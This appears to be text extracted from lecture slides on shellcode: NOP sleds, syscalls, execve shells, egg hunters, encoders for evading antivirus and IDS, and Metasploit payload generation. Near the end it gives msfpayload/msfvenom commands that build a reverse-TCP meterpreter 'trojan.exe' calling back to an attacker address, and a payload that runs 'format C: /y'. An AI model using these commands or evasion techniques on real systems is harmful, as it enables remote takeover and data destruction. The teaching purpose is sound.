Shellcode

! Shellcode
" A set of instructions injected and executed by
exploited software
" Also called a payload
" Denoted as shellcode because shellcode most
typically spawns a command shell

2
NOP Sled

! NOP Sled
" Set of instructions which ultimately do not aect
code execution
" Placed before shellcode so that a transfer of
execution into the NOP sled will transfer
execution into the shellcode
" NOP instruction (\x90)
" Good NOP sleds
! Do not interfere with code execution
! May be entered at any location
! Are hard to detect
3
NOP Sled
Technology
! IDS Evasion
" Easy to detect a large 0x90 NOP sled
" ADMutate
! Single-byte x86
" Opty2
! Part of Metasploit
! Multi-byte slide

4
NOP Sled
Technology
! Multi-byte NOP Sleds

5
Linux System Calls

! System Calls
" Aka syscall
" Powerful set of kernel functions
! Linux System Call
1. The syscall number is loaded into EAX
2. Arguments are placed in other registers
! EBX, ECX, EDX, ESI, EDI, EBP
3. Int 0x80 (\xCD \x80)
4. CPU switches to kernel mode
5. Syscall executes
6
Exit Shellcode

! Exit.c
" We will compile statically
! This will include the exit function in our executable
! gcc -static -o exit exit.c

7
Exit Shellcode

8
Exit Shellcode

! Two Syscalls
" Exit Group (0xFC)
! Argument 1: [esp+4] # 0
" Exit (0x01)
! Argument 1: [esp+4] # 0

9
Exit Shellcode

! Exit.asm
" NASM (Netwide Assembler)
" We do not need the exit group for our shellcode

10
Exit Shellcode

! Exit.asm
" Assemble with NASM
" Link/Load with ld
" Execute
" Dump with objdump

11
Exit Shellcode

! Shellcode Test
" Standard C template to test shellcode

12
Injectable Shellcode

! Common Constraints on Shellcode

" No null bytes
" Ascii text only
! Uppercase/lowercase
" Unicode only
! Uppercase/lowercase
"

13
Injectable Shellcode

! No Null Bytes
" Literals are a large source of nulls
" Xor trick
" Truncation trick

14
Injectable Shellcode

15
 Popping a Shell in Linux

! Local Shell Shellcode

" execve
int execve(const char *filename, char *const argv[], char *const
envp[])

16
Popping a Shell in Linux

! Local Shell Shellcode

17
Popping a Shell in Linux

18
Popping a Shell in Linux

19
Popping a Shell in Linux

! Jump / Call
" Position Independent Code (PIC) technique
" A call gives us access to relative addressing

20
 Popping a Shell in Linux

! Notes
" db in code section
! Essentially scratch space
" Avoid nulls Pop Ret into ESI
Clear EAX
! Xor Set J to null byte
Arg1 = &/bin/sh
! Truncation Set AAAA to &Arg1
Set KKKK to NULL
! Dynamic overwrite Syscall 0x0b (execve)
Arg1 = &/bin/sh
" PIC Arg2 = &&/bin/sh
Arg3 = &NULL
! Using ESI Syscall Interrupt

21
Popping a Shell in Linux

! Shellcode Test
" Standard C template to test shellcode

22
Windows Shellcoding

! Windows Shellcode
" System calls exist (int 0x2e)
! But most functionality is found elsewhere
" Windows uses DLLs for most system functions
! These addresses change per OS and service pack
" Code normally resolves addresses dynamically
! This makes Windows shellcode large
! Means we have to process the PEB in our shellcode
! Popping a Shell in Windows
" Never do this!

23
Position Independent Code
Revisited
! Noirs Get EIP
" dz
! Dummy FPU instruction
" fnstenv
! Gets the EIP of the last FPU instruction
" pop
! Pops the value into EAX
D9EE fldz
D97424F4 fnstenv [esp-0xc]
58 pop eax

24
 Position Independent Code
Revisited
! Call $+4
" Relative jump to inter-call instruction
" Opcodes are decoded on the y

E8FFFFFFFF call 0x4

FFC3 inc ebx
C3 ret Call 58 pop eax
58 pop eax

25
Types of Payloads

! Single
" Self-contained payload
! Stager
" A payload that loads then executes a stage
! Over a network connection
! Allows use of large payloads
! Kernel to user (ring 0 to ring 3) hando
! Metasploits stager_sysenter_hook
" Usually smaller than single payloads
! Stage
" A payload that is loaded via a stager

26
Types of Shellcode

! Local
! Remote

! Download and Execute

! Staged

! Egg-hunter
! Omelet
27
Local Versus Remote Shellcode

! Local Shellcode
" Privilege escalation
! Remote Shellcode
" Reverse
! Connect from victim back to hacker
! Bypasses rewalls and NAT
" Bind
! Open a server port on the victim for the hacker
" Find
! Reuse an existing connection

28
Download and Execute / Staged
Shellcode
! Download and Execute Shellcode
" Commonly used for browser drive-by attacks
" Shellcode downloads a le from a network
! Saves it to the disk, then executes it
! Staged Shellcode
" Stager shellcode downloads stage shellcode
! Stager usually called stage 1
! Stage usually called stage 2

29
Egg Hunter / Omelet
Shellcode
! Egg Hunter
" Small hunter shellcode is injected at a predictable
location
" Searches for a larger egg at a less predictable
location
! Omelet
" Recombines multiple small eggs into one payload
called the omelet
" Useful if you can only inject small blocks

30
Egg Hunter / Omelet
Shellcode
! Survivable Search Techniques
" NtAccessCheckAndAuditAlarm
! Oset 0x2 in KiServiceTable
; push address to check
push edx
; NtAccessCheckAndAuditAlarm
mov eax, 0x02
; syscall
int 0x2e
; did we get an ACCESS_VIOLATE (0xc0000005)?
cmp eax, 0xc0000005
31
Metasploit Egg Hunter

! Egg Hunter Stub

" Egg tag
! The marker repeated twice
" Marker
! Random 4-byte identifying value
" Checksum stub
! Computes the payload checksum in case we got a
false positive on the marker

32
 Metasploit Egg Hunter
check_readable: check_for_tag:
; jump at most 0xfff ahead ; check that the tag matches
or dx, 0xfff ; once
mov eax, #{marker}
next_addr: mov edi, edx
inc edx ; edx is for searching scasd ; compare [es:edi] to eax
push edx ; preserve edx jne next_addr ; not our marker
; NtAccessCheckAndAuditAlarm ; it must match a second time
push 0x02 ; since now edi = edx+4
pop eax ; eax = 0x02 scasd ; compare [es:edi] to eax
int 0x2e ; syscall jne next_addr
; did we get ACCESS_VIOLATION ; optionally insert a checksum
; (0xc0000005)? ; stub here
cmp al, 5 #{checksum}
pop edx ; restore edx ; jump to the payload
je check_readable jmp edi
33
Shellcode Encoder

! Encoder
" Algorithm to transform shellcode
" Creates equivalent shellcode with dierent byte
sequence that has special properties
! Filter evasion
! Character set restriction
! AV / IDS evasion
! Instruction patterns
! Static string detection (like /bin/sh)
! Size reduction
" Complex encoders often leave decoders in the
shellcode (called a decoder stub)
34
Shellcode Encoder
IDS Evasion
! Polymorphism
" Code unravels itself as it executes
" Typically implemented with a decoder stub
! Metamorphism
" Code changes to equivalent code
! Avoids pattern detection
" Randomness is used in the code generation

35
Encoders

! Xor
! Jump/Call Xor Additive Feedback
! Alpha/Unicode
! Shikata Ga Nai
! Others

36
Shikata Ga Nai Encoder

! Shikata Ga Nai
" Xor additive feedback encoder
" Japanese for nothing can be done about it
! Detection is too computationally expensive
! Especially for network devices
" Excellent encoder
! Default Metasploit encoder

37
ASCII Art Encoder

38
Metasploit Shellcode Generator

! msfpayload
" Metasploit shellcode generator
! Web
! Console
! Command-line

39
Metasploit Shellcode Generator

40
Metasploit Shellcode Generator

! msfencode
" Metasploit machine code encoder

41
Metasploit Shellcode Generator

42
Metasploit Shellcode Generator

43
Metasploit Shellcode Generator

! Using msfpayload and msfencode Together

" Generating custom shellcode (C arrays)
./msfpayload windows/exec \
cmd = format C: /y \
exitfunc = process R |
./msfencode -b \x00 -t c

" Generating a hostile executable

./msfpayload windows/meterpreter/reverse_tcp \
lhost = 192.168.1.50 \
lport = 12345 \
exitfunc = process R |
44
./msfencode -t exe -o trojan.exe
Metasploit Shellcode Generator

! Using msfpayload and msfencode Together

" msfvenom combines msfpayload and msfencode
" Generating a hostile executable
./msfvenom windows/meterpreter/reverse_tcp \
lhost = 192.168.1.50 \
lport = 12345 \
-t exe > trojan.exe

45
Metasploit Shellcode Generator

! AV Evasion

46
Generating Rick Roll Shellcode

47
Shellcode Resources

! Metasploit
! Shell-Storm.org

48
Questions/Comments?

49